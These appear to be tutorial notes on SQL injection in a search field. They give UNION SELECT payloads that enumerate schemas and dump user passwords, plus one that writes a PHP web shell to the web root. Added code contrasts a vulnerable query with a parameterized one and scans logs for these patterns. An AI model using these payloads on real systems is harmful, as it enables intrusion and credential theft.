# SQL Injection In The Search Field

### SQL Injection in search field

Let's say the search page is handled by a file named sql.php and the parameter is `search`, so a normal request looks like `sql.php?search=pentesting`. The first thing we try is searching with a single quote `'`:

```
sql.php?search='
```

If the page returns a database error, the quote reached the query unescaped and the field is very likely injectable. Our next step is to determine the number of columns the original query returns; running a normal search first gives an idea of what the page displays. Finding the number of columns:

```
sql.php?search=test' ORDER BY 1-- -
```

OR

```
sql.php?search=' ORDER BY 1-- -
```

We keep incrementing the number until we get an error; the last value that worked is the number of columns. Then we confirm it with a UNION SELECT along the lines of the following:

```
sql.php?search=pentesting' union select 1,1,1,1,1,1,1#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,1,1,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
```

We keep adjusting the number of 1s until the page no longer returns an error; counting the 1s at that point gives the number of columns, and the 1s that show up in the page tell us which positions are displayed. (When the payload is sent from a browser, the trailing `#` must be URL-encoded as `%23`, otherwise it is treated as a fragment and dropped.) Then we use the displayed positions to find the database name and version, the table names, and the columns of the target table:
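As an added example (not part of the original notes), here is a minimal search handler backed by an in-memory SQLite table, built first with string concatenation and then with a bound parameter; the tables, rows and function names are constructed for illustration. It shows why the ORDER BY probe errors one past the real column count, why a UNION with matching columns returns rows from another table, and that the same inputs are inert against the parameterized query. SQLite is used so the block runs stand-alone, so the MySQL-only `#` comment is replaced by the `-- -` form.

```python
import sqlite3


def make_db():
    """Constructed sample schema: a products table the search runs over, and a
    users table that the same query can be made to read."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (1, 'pentesting book', '20'), (2, 'lockpick set', '35');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash-placeholder');
    """)
    return conn


def search_vulnerable(conn, term):
    # The term is spliced into the SQL text: a quote in it closes the string
    # literal and everything after it is parsed as SQL (the sql.php bug above).
    sql = "SELECT id, name, price FROM products WHERE name LIKE '%" + term + "%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    # The term is bound as a parameter, so it is only ever compared as data.
    sql = "SELECT id, name, price FROM products WHERE name LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def column_count_probe(conn, search_fn, max_cols=10):
    """The ORDER BY n step from the notes: the first n that errors is one past
    the column count. Returns None when no probe errors, i.e. input stayed data."""
    for n in range(1, max_cols + 1):
        try:
            search_fn(conn, f"test' ORDER BY {n}-- -")
        except sqlite3.OperationalError:
            return n - 1
    return None


UNION_TERM = "x' UNION SELECT id, username, password FROM users-- -"

if __name__ == "__main__":
    db = make_db()
    print("columns via vulnerable handler:", column_count_probe(db, search_vulnerable))
    print("columns via safe handler:", column_count_probe(db, search_safe))
    print("vulnerable:", search_vulnerable(db, UNION_TERM))
    print("safe:", search_safe(db, UNION_TERM))
```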

```
sql.php?search=pentesting' union select 1,database(),@@version,1,1,1,1#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,database(),@@version,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
```

```
sql.php?search=pentesting' union select 1,table_name,1,1,1,1,1 from information_schema.tables#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,table_name,1,1,1,1,1 from information_schema.tables where 1=0 or 1=1-- '
```

```
sql.php?search=pentesting' union select 1,column_name,1,1,1,1,1 from information_schema.columns where table_name='users'#
```

OR

```
sql.php?search=' and 1 = 0 union all select 1,column_name,1,1,1,1,1 from information_schema.columns where table_name = 'users'-- '
```

```
sql.php?search=pentesting' union select 1,login,user,password,1,1,1 from users#
```

OR

```
sql.php?search=' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -
```

```
sql.php?search=pentesting' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",1,1,1,1,1 into outfile "/var/www/html/shell3.php"#
```

OR

```
sql.php?search=' and 1=0 union all select 1,"<?php echo shell_exec($_GET['cmd'])?>",1,1,1,1,1 into outfile "/var/www/html/shell3.php"#
```

#### Another method after finding the number of columns

Let's say we found there are three columns; we would continue this way:

```
searchitem=test' UNION SELECT 1,2,3-- -
```

```
searchitem=test' UNION SELECT 1,(select group_concat(SCHEMA_NAME) from INFORMATION_SCHEMA.SCHEMATA),3-- -
```

The SCHEMATA table holds the names of all databases the MySQL server knows about. Listing the tables of one of them (here `db`):

```
searchitem=test' UNION SELECT 1,(select group_concat(TABLE_NAME) from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db'),3-- -
```

Extracting the columns of a table:

```
searchitem=test' UNION SELECT 1,(select group_concat(COLUMN_NAME) from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'),3-- -
```

Extracting data from specific columns:

```
searchitem=test' UNION SELECT 1,(select username from db.users),3-- -
```

OR

```
searchitem=test' UNION SELECT 1,concat(id,':',name,':',password),3 from users-- -
```

#### Another method to find the number of columns and proceed further

```
' UNION select 1 from information_schema.tables #
' UNION select 1,2 from information_schema.tables #
' UNION select 1,2,3 from information_schema.tables #
```

The first one that returns output without an error indicates the number of columns. Proceeding:

```
' UNION select 1,table_schema,table_name from information_schema.tables #
```

```
' UNION select 1,table_name,column_name from information_schema.columns #
```

```
' UNION select 1,username,pwd from users #
```
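As an added example of the detection side (not part of the original notes), the following scans web-server access log lines for the probing and extraction patterns used throughout these notes: the ORDER BY column probe, UNION SELECT, reads of information_schema, INTO OUTFILE, and a quote followed by a SQL comment. The log lines, client address and timestamps are constructed; the path /sql.php and the parameter name follow the notes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Heuristic patterns matched case-insensitively against each decoded parameter value.
PATTERNS = {
    "column_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_read": re.compile(r"\binformation_schema\.", re.I),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.I),
    "quote_comment": re.compile(r"'.*?(--|#)", re.S),  # quote, then a SQL comment
}

# Common log format: client, identity, user, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: a normal search, an ORDER BY probe, a UNION schema read.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sql.php?search=pentesting HTTP/1.1" 200
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /sql.php?search=test%27%20ORDER%20BY%204--%20- HTTP/1.1" 500
203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /sql.php?search=test%27%20UNION%20SELECT%201,(select%20group_concat(TABLE_NAME)%20from%20INFORMATION_SCHEMA.TABLES),3--%20- HTTP/1.1" 200
"""


def classify(target):
    """Names of the patterns present in any query parameter of a request target.
    parse_qs percent-decodes values, so %27 is a quote before matching. A raw '#'
    is a fragment to urlsplit, so the MySQL '#' comment is only seen when logged as %23."""
    hits = set()
    for values in parse_qs(urlsplit(target).query, keep_blank_values=True).values():
        for value in values:
            hits.update(name for name, rx in PATTERNS.items() if rx.search(value))
    return hits


def scan(log_text):
    """Return (ip, status, sorted pattern names) for each flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m["target"])
        if hits:
            findings.append((m["ip"], m["status"], sorted(hits)))
    return findings


if __name__ == "__main__":
    for ip, status, names in scan(SAMPLE_LOG):
        print(ip, status, ", ".join(names))
```

A burst of column_probe hits ending in a 500 followed by a union_select from the same client is the sequence the notes describe, and is worth an alert on its own.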
